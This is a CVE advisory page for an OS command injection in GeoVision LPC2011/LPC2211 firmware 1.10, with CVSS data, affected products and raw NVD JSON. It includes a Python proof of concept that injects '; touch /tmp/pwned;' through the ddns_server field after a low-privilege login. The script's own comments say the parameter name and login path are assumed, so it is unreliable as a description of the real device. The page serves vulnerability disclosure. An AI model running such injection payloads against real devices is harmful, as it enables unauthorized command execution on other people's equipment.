Security Vulnerability Report
中文
CVE-2026-42364 CVSS 9.9 CRITICAL

CVE-2026-42364

Published: 2026-05-04 01:16:03
Last Modified: 2026-05-05 02:45:23
Source: 0df08a0e-a200-4957-9bb0-084f562506f9

Description

An os command injection vulnerability exists in the DdnsSetting.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted DDNS configuration can lead to arbitrary command execution. An attacker can modify a configuration value to trigger this vulnerability.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:geovision:gv-lpc2011_firmware:1.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:geovision:gv-lpc2011:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:geovision:gv-lpc2211_firmware:1.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:geovision:gv-lpc2211:-:*:*:*:*:*:*:* - NOT VULNERABLE
GeoVision LPC2011 1.10
GeoVision LPC2211 1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL for the DdnsSetting.cgi endpoint target_url = "http://<target-ip>/DdnsSetting.cgi" # Malicious payload to inject OS command # Example: Creating a file to verify execution # Shell metacharacters ';' are used to break the original command injected_command = "; touch /tmp/pwned;" # Data payload simulating a DDNS configuration update # The vulnerable parameter is assumed to be ddns_server or similar based on description payload_data = { "ddns_server": "attacker-controlled.com" + injected_command, "enable": "on", "submit": "Save" } # Attacker needs low privilege credentials (PR:L) credentials = { "username": "low_priv_user", "password": "password" } try: # Establish session and authenticate session = requests.Session() session.post(target_url.replace("DdnsSetting.cgi", "login.cgi"), data=credentials) # Send exploit request response = session.post(target_url, data=payload_data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check target system for command execution result.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42364", "sourceIdentifier": "0df08a0e-a200-4957-9bb0-084f562506f9", "published": "2026-05-04T01:16:03.470", "lastModified": "2026-05-05T02:45:23.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An os command injection vulnerability exists in the DdnsSetting.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted DDNS configuration can lead to arbitrary command execution. An attacker can modify a configuration value to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:geovision:gv-lpc2011_firmware:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "C1E349A9-4EEF-40B6-89A0-86242C2ADBC5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:geovision:gv-lpc2011:-:*:*:*:*:*:*:*", "matchCriteriaId": "87CE78D0-0894-451F-9A70-4F2A8062EC8A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:geovision:gv-lpc2211_firmware:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "0F3B818E-22D3-400A-AF2C-DEA66280464A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:geovision:gv-lpc2211:-:*:*:*:*:*:*:*", "matchCriteriaId": "59F15521-B4F3-4CCA-8C03-0A4EA2864C6E"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/", "source": "0df08a0e-a200-4957-9bb0-084f562506f9", "tags": ["Third Party Advisory"]}, {"url": "https://www.geovision.com.tw/cyber_security.php", "source": "0df08a0e-a200-4957-9bb0-084f562506f9", "tags": ["Vendor Advisory"]}]}}